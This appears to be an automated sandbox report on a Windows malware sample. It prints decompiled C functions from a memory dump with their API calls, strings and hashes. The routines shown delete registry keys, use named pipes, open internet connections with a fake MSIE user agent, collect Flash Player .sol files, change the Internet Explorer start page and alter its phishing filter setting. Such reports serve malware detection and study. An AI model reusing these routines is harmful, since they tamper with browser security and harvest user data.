        					_push( &_v12);
        					_push(_t38);
        					if( *0x414d7c() == 0) {
        						_v28 = _t61;
        						_v24 = _t61;
        					} else {
        						_v28 = _v20;
        						_v24 = _v16;
        					}
        					if((_v28 & _v24) == _t61) {
        						L7:
        						CloseHandle( *_t72);
        						 *_t72 =  *_t72 | 0xffffffff;
        					} else {
        						if((_v28 | _v24) == 0) {
        							L21:
        							_t72[2] = _t72[2] | 0xffffffff;
        							_t34 =  &(_t72[3]);
        							 *_t34 = _t72[3] | 0xffffffff;
        							__eflags =  *_t34;
        							_v41 = 1;
        							E00410043( *_t72, _t69, _t69, _t69);
        						} else {
        							_v20 = _t69;
        							_v16 = _t69;
        							if(ReadFile( *_t72,  &_v36, 5,  &_v40, _t69) != 0) {
        								while(1) {
        									__eflags = _v40 - _t69;
        									if(_v40 == _t69) {
        										goto L21;
        									}
        									__eflags = _v40 - 5;
        									if(_v40 != 5) {
        										L19:
        										_t50 = E00410043( *_t72, _v20, _v16, _t69);
        										__eflags = _t50;
        										if(_t50 == 0) {
        											goto L7;
        										} else {
        											_t51 = SetEndOfFile( *_t72);
        											__eflags = _t51;
        											if(_t51 == 0) {
        												goto L7;
        											} else {
        												goto L21;
        											}
        										}
        									} else {
        										_t53 = _v36 ^ _t72[4];
        										asm("adc edi, [esp+0x24]");
        										_t65 = _t53 + _v20 + 5;
        										asm("adc edi, ecx");
        										_v36 = _t53;
        										__eflags = 0 - _v24;
        										if(__eflags > 0) {
        											L18:
        											_t69 = 0;
        											__eflags = 0;
        											goto L19;
        										} else {
        											if(__eflags < 0) {
        												L14:
        												__eflags = _t53 - 0xa00000;
        												if(_t53 > 0xa00000) {
        													goto L18;
        												} else {
        													_t54 = E00410043( *_t72, _t53, 0, 1);
        													__eflags = _t54;
        													if(_t54 == 0) {
        														goto L7;
        													} else {
        														_v20 = _t65;
        														_v16 = 0;
        														_t57 = ReadFile( *_t72,  &_v36, 5,  &_v40, 0);
        														__eflags = _t57;
        														if(_t57 != 0) {
        															_t69 = 0;
        															__eflags = 0;
        															continue;
        														} else {
        															goto L7;
        														}
        													}
        												}
        											} else {
        												__eflags = _t65 - _v28;
        												if(_t65 > _v28) {
        													goto L18;
        												} else {
        													goto L14;
        												}
        											}
        										}
        									}
        									goto L22;
        								}
        								goto L21;
        							} else {
        								goto L7;
        							}
        						}
        					}
        				}
        				L22:
        				return _v33;
        			}

        APIs
        • CreateFileW.KERNEL32 ref: 004127E7
        • GetFileSizeEx.KERNEL32(00000000,C0000000), ref: 00412800
        • ReadFile.KERNEL32(?,00000001,00000005,00000002,00000000), ref: 00412855
        • CloseHandle.KERNEL32(?), ref: 00412861
        • ReadFile.KERNEL32(?,00000001,00000005,00000002,00000000,?,?,00000000,00000001), ref: 004128DC
        • SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 00412907
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$Read$CloseCreateHandleSize
        • String ID:
        • API String ID: 1850650832-0
        • Opcode ID: 9249fe289495d6ebc675f2f804e2b46492dc134a356bc702e28490dd9a390dc6
        • Instruction ID: 01bca9d1ccbe2c9fe2209116541275a3dc87b9888d3f3a67002a69a07841b2ef
        • Opcode Fuzzy Hash: 9249fe289495d6ebc675f2f804e2b46492dc134a356bc702e28490dd9a390dc6
        • Instruction Fuzzy Hash: 6C419A30108341AFD720DF25DD84AABBBE4FB89314F144A2EF0E4D22A0C3B4D995CB5A
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 42%
        			E0040FF5C(signed int __eax, void* __ecx, void** __esi, WCHAR* _a4) {
        				intOrPtr _v8;
        				void* _v12;
        				void* _t29;
        				void* _t30;
        				void* _t33;
        				signed int _t34;
        				void* _t37;
        				void* _t38;
        				signed int _t41;
        				signed int _t43;
        
        				_t52 = __esi;
        				_t41 = __eax;
        				asm("sbb eax, eax");
        				_t29 = CreateFileW(_a4, (__eax | 0xfffffffe) << 0x1e,  ~(__eax & 2) & 0x00000006 | 0x00000001, 0, 3, 0, 0);
        				__esi[2] = _t29;
        				if(_t29 == 0xffffffff) {
        					L10:
        					_t30 = 0;
        					__eflags = 0;
        				} else {
        					_push( &_v12);
        					_push(_t29);
        					if( *0x414d7c() == 0 || _v8 != 0) {
        						L9:
        						CloseHandle(_t52[2]);
        						goto L10;
        					} else {
        						_t33 = _v12;
        						__esi[1] = _t33;
        						if(_t33 != 0) {
        							_push(0);
        							_push(0);
        							_push(0);
        							_t34 = 0;
        							_t43 = _t41 & 0x00000001;
        							_t37 = CreateFileMappingW(__esi[2], 0, (_t34 & 0xffffff00 | __eflags != 0x00000000) + (_t34 & 0xffffff00 | __eflags != 0x00000000) + 2, ??, ??, ??);
        							__esi[3] = _t37;
        							__eflags = _t37;
        							if(_t37 == 0) {
        								goto L9;
        							} else {
        								__eflags = _t43;
        								_t38 = MapViewOfFile(_t37, (_t43 == 0) + (_t43 == 0) + 2, 0, 0, 0);
        								 *__esi = _t38;
        								__eflags = _t38;
        								if(_t38 != 0) {
        									goto L5;
        								} else {
        									CloseHandle(__esi[3]);
        									goto L9;
        								}
        							}
        						} else {
        							__esi[3] = 0;
        							 *__esi = 0;
        							L5:
        							_t30 = 1;
        						}
        					}
        				}
        				return _t30;
        			}

        APIs
        • CreateFileW.KERNEL32(?,00000000,?,00000000,00000003,00000000,00000000,00000000,00417FD6,?,?,?,004041FB,00414540,?,00000006), ref: 0040FF88
        • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,004041FB,00414540,?,00000006,00000000,00000000,00000000,00000000), ref: 0040FF9B
        • CreateFileMappingW.KERNEL32(?,00000000,?,00000000,00000000,00000000,?,?,?,004041FB,00414540,?,00000006,00000000,00000000,00000000), ref: 0040FFD2
        • MapViewOfFile.KERNEL32(00000000,?,00000000,00000000,00000000,?,?,?,004041FB,00414540,?,00000006,00000000,00000000,00000000,00000000), ref: 0040FFEF
        • CloseHandle.KERNEL32(?,?,?,?,004041FB,00414540,?,00000006,00000000,00000000,00000000,00000000), ref: 0040FFFE
        • CloseHandle.KERNEL32(?,?,?,?,004041FB,00414540,?,00000006,00000000,00000000,00000000,00000000), ref: 00410007
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$CloseCreateHandle$MappingSizeView
        • String ID:
        • API String ID: 2246244431-0
        • Opcode ID: 5bd861fa9add532afefc2ffb569e3553e8c3a2124667b3612ee4729e2e9fa6c8
        • Instruction ID: b7221dff55158552bd5e971fd7d158924363d1b764eef9b189cc8c7810b409c6
        • Opcode Fuzzy Hash: 5bd861fa9add532afefc2ffb569e3553e8c3a2124667b3612ee4729e2e9fa6c8
        • Instruction Fuzzy Hash: 6D21C3B5100601BFCB204B66EC4DDABBFFCEBD97507108A3EF052C22A0E6759981CA24
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040B712() {
        				intOrPtr _t7;
        				intOrPtr _t9;
        				intOrPtr _t11;
        				intOrPtr _t14;
        
        				SetThreadPriority(GetCurrentThread(), 2);
        				_t7 =  *0x414ad4; // 0x241f5a8
        				SHDeleteKeyA(0x80000001,  *(_t7 + 0x48));
        				_t9 =  *0x414ad4; // 0x241f5a8
        				SHDeleteKeyA(0x80000002,  *(_t9 + 0x48));
        				_t11 =  *0x414ad4; // 0x241f5a8
        				SHDeleteKeyA(0x80000002,  *(_t11 + 0x4c));
        				Sleep(0x3e8);
        				_t14 =  *0x414ad4; // 0x241f5a8
        				return E0040AA33(0,  *((intOrPtr*)(_t14 + 0x2c)), 0xe, 0, 0, 0, 0);
        			}

        APIs
        • GetCurrentThread.KERNEL32 ref: 0040B715
        • SetThreadPriority.KERNEL32(00000000,?,0040859C), ref: 0040B71C
        • SHDeleteKeyA.SHLWAPI(80000001,?,?,0040859C), ref: 0040B72F
        • SHDeleteKeyA.SHLWAPI(80000002,?,?,0040859C), ref: 0040B743
        • SHDeleteKeyA.SHLWAPI(80000002,?,?,0040859C), ref: 0040B752
        • Sleep.KERNEL32(000003E8,?,0040859C), ref: 0040B75D
          • Part of subcall function 0040AA33: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,000000FF,?,?,00000000), ref: 0040AA88
          • Part of subcall function 0040AA33: SetNamedPipeHandleState.KERNEL32(00000000,000000FF,00000000,00000000,?,?,00000000), ref: 0040AAA3
          • Part of subcall function 0040AA33: WriteFile.KERNEL32(00000000,?,00000004,00000002,00000000,?,?,00000000), ref: 0040AABF
          • Part of subcall function 0040AA33: WriteFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040AAD8
          • Part of subcall function 0040AA33: WriteFile.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,?,00000000), ref: 0040AAF2
          • Part of subcall function 0040AA33: ReadFile.KERNEL32(00000000,00000002,00000004,00000002,00000000,?,?,00000000), ref: 0040AB0B
          • Part of subcall function 0040AA33: ReadFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040AB28
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: File$DeleteWrite$ReadThread$CreateCurrentHandleNamedPipePrioritySleepState
        • String ID:
        • API String ID: 2160410962-0
        • Opcode ID: 6f66d1e95d5aa60d4e1613b786ecdc00d86ce19ad1576aed66f780645dc72c1b
        • Instruction ID: 454c356d8e9268c3eac19626cd04da9b303d97c2f0f1bfc0c7748119974f95fa
        • Opcode Fuzzy Hash: 6f66d1e95d5aa60d4e1613b786ecdc00d86ce19ad1576aed66f780645dc72c1b
        • Instruction Fuzzy Hash: CDF0DA72151210BFE7415FE5FD09EDA3B68FF88311B028070FA09D61B1DAB18860CB69
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 75%
        			E00404C58(void* __eax, void* __ecx, void* __esi, void* __eflags) {
        				intOrPtr _v8;
        				signed int _v12;
        				WCHAR* _v16;
        				void* __ebx;
        				void* __edi;
        				intOrPtr _t23;
        				intOrPtr _t27;
        				WCHAR* _t34;
        				intOrPtr _t36;
        				WCHAR** _t37;
        				intOrPtr _t39;
        				intOrPtr _t41;
        				intOrPtr _t45;
        				signed int _t46;
        				signed int _t48;
        				signed int _t51;
        				intOrPtr _t57;
        				void* _t60;
        
        				_v12 = 0;
        				_t23 = E0040A332(__eax,  &_v12, __ecx + __eax, 0, 0x64);
        				_v8 = _t23;
        				if(_t23 != 0) {
        					 *0x414ed8("pVirtualKeyExA");
        					_t48 = 0;
        					if(_v8 > 0) {
        						do {
        							_t34 = E0040F5EA(_v12 | 0xffffffff,  *((intOrPtr*)(_v12 + _t48 * 4)));
        							_v16 = _t34;
        							if(_t34 != 0) {
        								_t51 = 0;
        								_t57 =  *0x414778; // 0x74537972
        								if(_t57 > 0) {
        									do {
        										_t36 =  *0x41477c; // 0x676e6972
        										_t37 = _t36 + _t51 * 4;
        										if( *_t37 != 0 && lstrcmpiW( *_t37, _v16) == 0) {
        											_t39 =  *0x41477c; // 0x676e6972
        											E0040F15E( *((intOrPtr*)(_t39 + _t51 * 4)));
        											_t41 =  *0x41477c; // 0x676e6972
        											 *((intOrPtr*)(_t41 + _t51 * 4)) = 0;
        										}
        										_t51 = _t51 + 1;
        										_t60 = _t51 -  *0x414778; // 0x74537972
        									} while (_t60 < 0);
        								}
        								E0040F15E(_v16);
        							}
        							_t48 = _t48 + 1;
        						} while (_t48 < _v8);
        					}
        					_t27 =  *0x414778; // 0x74537972
        					_t45 =  *0x41477c; // 0x676e6972
        					_t46 = 0;
        					if(_t27 > 0) {
        						while( *((intOrPtr*)(_t45 + _t46 * 4)) == 0) {
        							_t46 = _t46 + 1;
        							if(_t46 < _t27) {
        								continue;
        							}
        							goto L15;
        						}
        					}
        					L15:
        					if(_t46 == _t27) {
        						 *0x414778 = 0;
        						E0040F15E(_t45);
        					}
        					 *0x414edc("pVirtualKeyExA");
        					E0040F17A(_v8, _v12);
        				}
        				E004047F5(0);
        				return 0;
        			}

        APIs
        • RtlEnterCriticalSection.NTDLL(pVirtualKeyExA), ref: 00404C83
        • lstrcmpiW.KERNEL32(676E6972,?,?,?,?,00000000,00000064), ref: 00404CC1
          • Part of subcall function 0040F15E: HeapFree.KERNEL32(00000000,00000000,0040AD5B,00000000,00000001), ref: 0040F171
        • RtlLeaveCriticalSection.NTDLL(pVirtualKeyExA), ref: 00404D28
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalSection$EnterFreeHeapLeavelstrcmpi
        • String ID: pVirtualKeyExA$ryStringW
        • API String ID: 2749521334-3252542104
        • Opcode ID: d3ef7adb61e24ed7707c8531e60ec3c0f98204fb0eba40159b854a4407d72b7f
        • Instruction ID: 53ff5075365b2bc4a22c2f581c7cfbd323e15892a5cdcda01cfa3ee234b1d21f
        • Opcode Fuzzy Hash: d3ef7adb61e24ed7707c8531e60ec3c0f98204fb0eba40159b854a4407d72b7f
        • Instruction Fuzzy Hash: 3B2191B1900214EFDB20AFB5ED8589D77B5FBC9301712807AE621B72E1CB389D429B58
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 77%
        			E0040642E(void* __ecx, void* __edi, intOrPtr _a4) {
        				long _v8;
        				intOrPtr _t10;
        				intOrPtr _t13;
        				void* _t15;
        				void* _t31;
        				void* _t37;
        
        				_t37 = __edi;
        				if(__edi <= 0x3e8) {
        					 *0x414ed8(0x4147a4);
        					_v8 = GetTickCount();
        					_t10 =  *0x4147bc; // 0x7373654d
        					if(_t10 != 0 && _v8 - _t10 > 0xea60) {
        						E004063F9();
        					}
        					_t12 = ( *0x4147a0 & 0x0000ffff) + _t37;
        					if(( *0x4147a0 & 0x0000ffff) + _t37 <= 0x3e8) {
        						_t13 = E0040F117(_t12,  *0x4147c4);
        						if(_t13 != 0) {
        							 *0x4147c4 = _t13;
        							E0040F19A(( *0x4147a0 & 0x0000ffff) + _t13, _a4, _t37);
        							 *0x4147a0 =  *0x4147a0 + _t37;
        						}
        					} else {
        						_t31 = RtlAllocateHeap( *0x415fa8, 8, 0x3ec);
        						if(_t31 != 0) {
        							E0040F19A(_t17 - _t37 + 0x3e8, _a4, _t37);
        							E0040F19A(_t31, ( *0x4147a0 & 0x0000ffff) +  *0x4147c4 + _t37 - 0x3e8, 0x3e8 - _t37);
        							E0040F15E( *0x4147c4);
        							 *0x4147c4 = _t31;
        							 *0x4147a0 = 0x3e8;
        						}
        					}
        					 *0x4147bc = _v8;
        					_t15 =  *0x414edc(0x4147a4);
        				} else {
        					_t15 = E004063F9();
        				}
        				return _t15;
        			}

        APIs
        • RtlEnterCriticalSection.NTDLL(004147A4), ref: 0040644B
        • GetTickCount.KERNEL32 ref: 00406451
        • RtlAllocateHeap.NTDLL(00000008,000003EC), ref: 00406490
        • RtlLeaveCriticalSection.NTDLL(004147A4), ref: 0040651F
          • Part of subcall function 004063F9: RtlEnterCriticalSection.NTDLL(004147A4), ref: 00406400
          • Part of subcall function 004063F9: RtlLeaveCriticalSection.NTDLL(004147A4), ref: 00406426
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalSection$EnterLeave$AllocateCountHeapTick
        • String ID: MessageW
        • API String ID: 2032597661-511154193
        • Opcode ID: 8ce53716e63ef59e52f3b59414a18f402464df3b1a4a3fe9836199a74e15210f
        • Instruction ID: 71d7fef707f7e118032529ae5f8b316327552308b24b78040d7661cbec0e1816
        • Opcode Fuzzy Hash: 8ce53716e63ef59e52f3b59414a18f402464df3b1a4a3fe9836199a74e15210f
        • Instruction Fuzzy Hash: EE21C271600241EFC720AF65ED459AE3AA8FBC5704B15813FB41AE62E1DB788D50DB5C
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 72%
        			E004047F5(void* __ebx) {
        				char _v8;
        				intOrPtr _v12;
        				signed int _v16;
        				intOrPtr _v20;
        				void* __esi;
        				signed int _t18;
        				intOrPtr _t27;
        				void* _t29;
        				void* _t34;
        				intOrPtr _t35;
        				intOrPtr _t36;
        				void* _t37;
        				void* _t39;
        				signed int _t40;
        				void* _t42;
        				void* _t47;
        
        				_t40 = 0;
        				_t37 = 0;
        				_v8 = 0;
        				 *0x414ed8("pVirtualKeyExA");
        				_t18 = 0;
        				_v16 = 0;
        				_t42 =  *0x414778 - _t37; // 0x74537972
        				if(_t42 <= 0) {
        					L9:
        					 *0x414edc("pVirtualKeyExA");
        					E00408A2F(_t37, _t47, 0, "PopOpO03-3331111", _t40);
        					return E0040F15E(_t40);
        				}
        				do {
        					_t35 =  *0x41477c; // 0x676e6972
        					_t23 = _t35 + _t18 * 4;
        					if( *(_t35 + _t18 * 4) != 0) {
        						_t36 = E0040F583(_t23 | 0xffffffff,  *_t23);
        						_v12 = _t36;
        						if(_t36 != 0) {
        							_t27 = E0040F637(_t36);
        							_t34 = _t27 + _t37;
        							_v20 = _t27;
        							_t29 = E0040F0F6(_t34 + 1,  &_v8);
        							_t40 = _v8;
        							if(_t29 != 0) {
        								E0040F19A(_t37 + _t40, _v12, _v20);
        								_t39 = _t34;
        								 *((char*)(_t39 + _t40)) = 0x20;
        								_t37 = _t39 + 1;
        							}
        							E0040F15E(_v12);
        						}
        					}
        					_t18 = _v16 + 1;
        					_v16 = _t18;
        					_t47 = _t18 -  *0x414778; // 0x74537972
        				} while (_t47 < 0);
        				goto L9;
        			}

        APIs
        • RtlEnterCriticalSection.NTDLL(pVirtualKeyExA), ref: 00404809
        • RtlLeaveCriticalSection.NTDLL(pVirtualKeyExA), ref: 0040488D
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalSection$EnterLeave
        • String ID: PopOpO03-3331111$pVirtualKeyExA$ryStringW
        • API String ID: 3168844106-3132647893
        • Opcode ID: 856897508dc3eb2d2dd6a5f740af23b6c0af515f567466c0ad20695f6def1a54
        • Instruction ID: 66ed406b861a50cb862cc8a16632bad892fe40656053a47b74d21d0a40110743
        • Opcode Fuzzy Hash: 856897508dc3eb2d2dd6a5f740af23b6c0af515f567466c0ad20695f6def1a54
        • Instruction Fuzzy Hash: 8A11DF72900244EFCB21BF6ACC45ADE7BB5FF85714B11847AE024B72D1C7399A46CB98
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040FA6D(signed int __eax, char* __ecx) {
        				short _v28;
        				char* _v32;
        				signed int _t5;
        				void* _t12;
        				void* _t14;
        				char* _t15;
        				void* _t17;
        
        				_t15 = __ecx;
        				_t5 = __eax;
        				if(__ecx == 0) {
        					_t15 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)";
        				}
        				_t14 = InternetOpenA(_t15,  !_t5 & 0x00000001, 0, 0, 0);
        				if(_t14 == 0) {
        					L7:
        					return 0;
        				}
        				_t17 = 0;
        				do {
        					_t1 = _t17 + 0x41400c; // 0x41400c
        					_t2 = _t17 +  &E00414008; // 0x2
        					InternetSetOptionA(_t14,  *_t2, _t1, 4);
        					_t17 = _t17 + 8;
        				} while (_t17 < 0x18);
        				_t12 = InternetConnectA(_t14, _v32, _v28, 0, 0, 3, 0, 0);
        				if(_t12 == 0) {
        					InternetCloseHandle(_t14);
        					goto L7;
        				}
        				return _t12;
        			}

        APIs
        • InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 0040FA84
        • InternetSetOptionA.WININET(00000000,00000002,0041400C,00000004), ref: 0040FAA3
        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040FAC0
        • InternetCloseHandle.WININET(00000000), ref: 0040FACC
        Strings
        • Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1), xrefs: 0040FA75, 0040FA83
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Internet$CloseConnectHandleOpenOption
        • String ID: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
        • API String ID: 910987326-2068255511
        • Opcode ID: 9fb399d4ba70c751e7fda5396c7e59361f6489e9cb7e102260a246b0c1febed7
        • Instruction ID: 44ee639f3f4135d01c397f351ea4cacc153b05c21a8fd8268a4f44a556464a15
        • Opcode Fuzzy Hash: 9fb399d4ba70c751e7fda5396c7e59361f6489e9cb7e102260a246b0c1febed7
        • Instruction Fuzzy Hash: AFF0C2723412207BDB3147A29C88EEBBE5DEF893E47014432F21AE1860C234891087BC
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 54%
        			E0040FE74() {
        				char _v8;
        				struct HINSTANCE__* _v12;
        				void* _v1036;
        				struct HINSTANCE__* _t13;
        				_Unknown_base(*)()* _t15;
        				char _t22;
        				void* _t28;
        
        				_t22 = 0;
        				_t13 = LoadLibraryA("urlmon.dll");
        				_v12 = _t13;
        				if(_t13 != 0) {
        					_t15 = GetProcAddress(_t13, "ObtainUserAgentString");
        					if(_t15 != 0) {
        						_push( &_v8);
        						_push( &_v1036);
        						_push(0);
        						_v8 = 0x3ff;
        						_v1036 = 0;
        						if( *_t15() == 0) {
        							if(_v8 > 0x3ff) {
        								_v8 = 0x3ff;
        							}
        							 *((char*)(_t28 + _v8 - 0x408)) = _t22;
        							_t22 = E0040F346( &_v1036 | 0xffffffff,  &_v1036);
        						}
        					}
        					FreeLibrary(_v12);
        				}
        				return _t22;
        			}

        APIs
        • LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 0040FE85
        • GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 0040FE98
        • FreeLibrary.KERNEL32(?), ref: 0040FEEA
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Library$AddressFreeLoadProc
        • String ID: ObtainUserAgentString$urlmon.dll
        • API String ID: 145871493-2685262326
        • Opcode ID: 6834644476a239007017ea1b47c5a167766a8d7ab6b36973dd9f3fdc70fd1ab2
        • Instruction ID: 7196f1a1a81746876e2f75059bb60244ad8aa23d00c64408a657e722c573b090
        • Opcode Fuzzy Hash: 6834644476a239007017ea1b47c5a167766a8d7ab6b36973dd9f3fdc70fd1ab2
        • Instruction Fuzzy Hash: CD01ACB1900114ABCB20DBE4ED845DE7BB8AB44300F2045BBB755F32D1DA345E488768
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 75%
        			E004053C0(intOrPtr _a4) {
        				short _v528;
        				void* __edi;
        				void* _t8;
        				void* _t17;
        
        				_t8 =  *0x414b58(0,  &_v528, 0x1a, 0);
        				if(_t8 != 0) {
        					PathCombineW( &_v528,  &_v528, L"Macromedia\\Flash Player");
        					if(_a4 == 0) {
        						_t8 = E004135EC(1, _t16, _t17,  &_v528, L"mfplayer_cfg.cab");
        					} else {
        						_t16 =  &_v528;
        						_t8 = E0040B844( &_v528, L"*.sol");
        					}
        				}
        				if(_a4 != 0) {
        					return _t8;
        				} else {
        					return E00404EA2(_t16, 0, 2, 0);
        				}
        			}








        APIs
        • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,00000000,00000000), ref: 004053D8
        • PathCombineW.SHLWAPI(?,?,Macromedia\Flash Player), ref: 004053EF
          • Part of subcall function 0040B844: PathCombineW.SHLWAPI(?,?,00401040,00000000,00000000,00000000), ref: 0040B867
          • Part of subcall function 0040B844: FindFirstFileW.KERNEL32(?,?), ref: 0040B87A
          • Part of subcall function 0040B844: PathMatchSpecW.SHLWAPI(?,?), ref: 0040B8C5
          • Part of subcall function 0040B844: PathCombineW.SHLWAPI(?,?,0000002E), ref: 0040B8DD
          • Part of subcall function 0040B844: FindNextFileW.KERNEL32(00000000,?,?), ref: 0040B918
          • Part of subcall function 0040B844: FindClose.KERNEL32(00000000), ref: 0040B927
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Path$CombineFind$File$CloseFirstFolderMatchNextSpecSpecial
        • String ID: *.sol$Macromedia\Flash Player$mfplayer_cfg.cab
        • API String ID: 304139136-2957579075
        • Opcode ID: 03e64951854c02a268a9139ad083975156b01422f1e6610cdd9a0e8f38360a93
        • Instruction ID: b142cbbd483e0d5c6abda0a69839733cb4f7b9459a201d1bc40bf6e107500214
        • Opcode Fuzzy Hash: 03e64951854c02a268a9139ad083975156b01422f1e6610cdd9a0e8f38360a93
        • Instruction Fuzzy Hash: 42F022F26002083AE700EB619C89FEB372CC784309F60C073B610B61C2D678DD888A68
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00408668(void* __ecx, char* _a4, int _a8) {
        				void* _v8;
        				int _t13;
        
        				_t13 = 0;
        				_v8 = 0x80000001;
        				if(RegCreateKeyExA(0x80000001, "software\\microsoft\\internet explorer\\main", 0, 0, 0, 2, 0,  &_v8, 0) == 0) {
        					if(RegSetValueExA(_v8, "Start Page", 0, 1, _a4, _a8) == 0) {
        						_t13 = 1;
        					}
        					RegCloseKey(_v8);
        				}
        				return _t13;
        			}






        APIs
        • RegCreateKeyExA.ADVAPI32(80000001,software\microsoft\internet explorer\main,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000,?,?,004059B0,00000001,00000000,00000001), ref: 00408688
        • RegSetValueExA.ADVAPI32(?,Start Page,00000000,00000001,?,?,?,?,004059B0,00000001,00000000,00000001,!!!0-0=9-0=23434,?,00000001,3709128dk0023444), ref: 004086A3
        • RegCloseKey.ADVAPI32(?,?,?,004059B0,00000001,00000000,00000001,!!!0-0=9-0=23434,?,00000001,3709128dk0023444,00000001,09ck_=ldfuihpfre), ref: 004086B2
        Strings
        • Start Page, xrefs: 0040869B
        • software\microsoft\internet explorer\main, xrefs: 0040867F
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CloseCreateValue
        • String ID: Start Page$software\microsoft\internet explorer\main
        • API String ID: 1818849710-2333123338
        • Opcode ID: 3f72b508191d2304732dd8c00b647a79f35cce80c374dd2a500c706903c49bbe
        • Instruction ID: a5947eacba37599ba9e3f55c47b65635f87dd7317843f3ddb3d56d3abedb189c
        • Opcode Fuzzy Hash: 3f72b508191d2304732dd8c00b647a79f35cce80c374dd2a500c706903c49bbe
        • Instruction Fuzzy Hash: 8FF08971250108BFEF105FD0CD8AFDF766DEB10784F104035B505B21A0D6769E109624
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E004122A7(void* _a4, short* _a8, char* _a12) {
        				int _t12;
        
        				_t12 = 0;
        				if(RegCreateKeyExW(_a4, L"software\\microsoft\\internet explorer\\phishingfilter", 0, 0, 0, 2, 0,  &_a4, 0) == 0) {
        					if(RegSetValueExW(_a4, _a8, 0, 4, _a12, 4) == 0) {
        						_t12 = 1;
        					}
        					RegCloseKey(_a4);
        				}
        				return _t12;
        			}





        APIs
        • RegCreateKeyExW.ADVAPI32(?,software\microsoft\internet explorer\phishingfilter,00000000,00000000,00000000,00000002,00000000,?,00000000,Enabled,?,00412258,?,?,00000000), ref: 004122C0
        • RegSetValueExW.ADVAPI32(?,?,00000000,00000004,?,00000004,?,00412258,?,?,00000000,?,?,0040D7D7,80000002,EnabledV8), ref: 004122D8
        • RegCloseKey.ADVAPI32(?,?,00412258,?,?,00000000,?,?,0040D7D7,80000002,EnabledV8,80000002,EnabledV8,80000002,Enabled,80000001), ref: 004122E7
        Strings
        • Enabled, xrefs: 004122AA
        • software\microsoft\internet explorer\phishingfilter, xrefs: 004122B8
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CloseCreateValue
        • String ID: Enabled$software\microsoft\internet explorer\phishingfilter
        • API String ID: 1818849710-3174912645
        • Opcode ID: 68322bd4febd3306fe28399a910b0fe9c06c88d45e15e5f5d4d0d542dff15977
        • Instruction ID: c8f73b408be23a5dc62d321a3c3244782e8ebee6fee6495011d806c5bec288ba
        • Opcode Fuzzy Hash: 68322bd4febd3306fe28399a910b0fe9c06c88d45e15e5f5d4d0d542dff15977
        • Instruction Fuzzy Hash: DDF0A5B524420CBFEB114F90DC85FEB7B6DEB50798F108026BA04991A0D272AD60AA68
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0041225C(void* _a4, short* _a8, int* _a12, char* _a16, int* _a20) {
        				int _t14;
        
        				_t14 = 0;
        				if(RegOpenKeyExW(_a4, L"software\\microsoft\\internet explorer\\phishingfilter", 0, 1,  &_a4) == 0) {
        					if(RegQueryValueExW(_a4, _a8, 0, _a12, _a16, _a20) == 0) {
        						_t14 = 1;
        					}
        					RegCloseKey(_a4);
        				}
        				return _t14;
        			}





        APIs
        • RegOpenKeyExW.ADVAPI32(00000004,software\microsoft\internet explorer\phishingfilter,00000000,00000001,00000004,Enabled,?,00412226,00000004,?,?,00000000,?), ref: 00412271
        • RegQueryValueExW.ADVAPI32(00000004,?,00000000,?,80000001,0040D78C,?,00412226,00000004,?,?,00000000,?), ref: 0041228B
